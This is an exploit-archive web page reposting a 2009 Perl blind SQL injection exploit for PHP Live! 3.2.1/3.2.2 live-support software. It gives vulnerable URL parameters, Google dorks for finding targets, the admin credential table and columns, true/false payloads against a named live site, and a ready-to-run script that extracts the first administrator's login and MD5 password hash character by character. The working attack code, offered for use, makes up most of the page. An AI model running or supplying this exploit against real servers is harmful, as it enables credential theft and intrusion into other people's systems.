首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Exploit
来源:boom3rang[at]live.com 作者:boom3rang 发布时间:2009-07-27  

#!/usr/bin/perl

#################################################################
#################################################################
################ Original discover author banner ################
#################################################################
#################################################################
#  PhpLive 3.2.1/2 (x) Blind SQL injection                                       [_][-][X]
#      _  ___  _  ___      ___ ___ _____      __  ___ __   __  ___      
#     | |/ / || |/ __|___ / __| _ \ __\ \    / / |_  )  \ /  \/ _ \     
#     | ' <| __ | (_ |___| (__|   / _| \ \/\/ /   / / () | () \_, /     
#     |_|\_\_||_|\___|    \___|_|_\___| \_/\_/   /___\__/ \__/ /_/      
#                                                                         
#                                                                       
#      Red n'black i dress eagle on my chest.
#      It's good to be an ALBANIAN Keep my head up high for that flag i die.
#      Im proud to be an ALBANIAN
#   ###################################################################  
#       Author             : boom3rang                             
#       Contact            : boom3rang[at]live.com                        
#       Greetz       : H!tm@N - KHG - cHs
#
#          R.I.P redc00de                
#   -------------------------------------------------------------------  
#                                            
#                  Affected software description                        
#       Software     : PhpLive                                         
#       Vendor        : http://www.phplivesupport.com                    
#       Price               : Live Support Download Starts at $89.95        
#       Version Vuln.    : v3.2.1 & v3.2.2                    
#   -------------------------------------------------------------------  
#                                            
#    [~] SQLi :                                        
#                                            
#    http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]         
#    http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]                     
#    
#                                                                 
#    [~]Google Dork :                                           
#  
#    Powered by PHP Live! v3.2.1                              
#    Powered by PHP Live! v3.2.2
#    allinurl:"request.php" "deptid"                                
#                                            
#   -------------------------------------------------------------------  
#                                            
#    [~] Table_NAME  =  chat_admin
#    [~] Column_NAME =  login - password - email - userID - name                                                                      
#   -------------------------------------------------------------------  
#                                            
#    [~] Admin Path :                                    
#                                            
#    http://www.TARGET.com/phplive  
#   -------------------------------------------------------------------                        
#    [~] Live Demo:
#  
#    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1    --> True
#    http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2    --> False
#
#   -------------------------------------------------------------------
#
#    [~] ASCII
#
#  /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100
#
#   -------------------------------------------------------------------
#  
#    [~] Live Demo ASCII
#
#      True
#   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48      
#    
#      False
#   http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127             
#                    

###########################
###########################
# Modified version banner #
###########################
###########################

# Author: skys
# Contact: skysbsb[at]gmail.com
# This script uses the PhpLive Blind Sql Injection (found by boom3rang) to recover first user login and MD5 password!
# The result of this script is like:
# admin:890f37d479270aea39ae0e156bbd9001


####################
# EDIT THESE LINES #
####################

# Edit this address acording to the php live path
$address = "http://www.site.com/phplive";

###############################
# DO NOT EDIT BELOW THIS LINE #
###############################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

@site = ($address."/request.php?l=agenciawiv&x=1/**/and/**/ascii%28substring%28%28select/**/concat%28login,0x3a,password%29/**/from/**/chat_admin/**/limit/**/1,1%29,", ",1%29%29=");

$base64str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";


$tudo = "";
$foundcolon = 0;


for($i=1;$i<=100;$i++) {
    $found = 0;

    if($foundcolon == 0) {
        for($x=32;$x<=127;$x++) {
            $url = $site[0].$i.$site[1].$x;
            print "Testing pass index $i: character ".chr($x)."($x)\n";
            $resp = query($url);
            if($resp =~ m/deptid/i) {
                print "Found i($i): ".chr($x)."($x)\n";
                $tudo .= chr($x);
                print "All: $tudo\n";
                $found = 1;
                if($x == 0x3a) {
                    $foundcolon = 1;
                }
                last;
            }
        }
    } else {
        for($x=0;$x<length($base64str);$x++) {
            $url = $site[0].$i.$site[1].ord(substr($base64str, $x, 1));
            print "Testing pass index $i: character ".ord(substr($base64str, $x, 1))."(".substr($base64str, $x, 1).")\n";
            $resp = query($url);
            if($resp =~ m/deptid/i) {
                print "Found i($i): ".substr($base64str, $x, 1)."(".ord(substr($base64str, $x, 1)).")\n";
                $tudo .= substr($base64str, $x, 1);
                print "All: $tudo\n";
                $found = 1;
                last;
            }
        }
    }

    if($found == 0) {
        print "Not found char index $i! End of md5 hash? :-)\n";
        last;
    }
}

print "login:md5: $tudo\n";
exit;

sub query() {
    $link = $_[0];
    my $req = HTTP::Request->new( GET => $link );
    my $ua = LWP::UserAgent->new();
    my $response = $ua->request($req);
    return $response->content;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WzdFTPD <= 8.0 Remote Denial o
·Mozilla Firefox 3.5 (Font tags
·Ekiga 2.0.5 (GetHostAddress) R
·Wordpress 2.8.1 (url) Remote C
·OpenH323 Opal SIP Protocol Rem
·Scripteen Free Image Hosting S
·The my_gallery version 2.4.1 p
·MS Internet Explorer 7/8 findT
·e107 Plugin my_gallery 2.4.1 r
·Pixaria Gallery 2.3.5 (file) R
·WINMOD 1.4 (.lst) Local Stack
·Oracle version 11.1.0.6.0 win3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved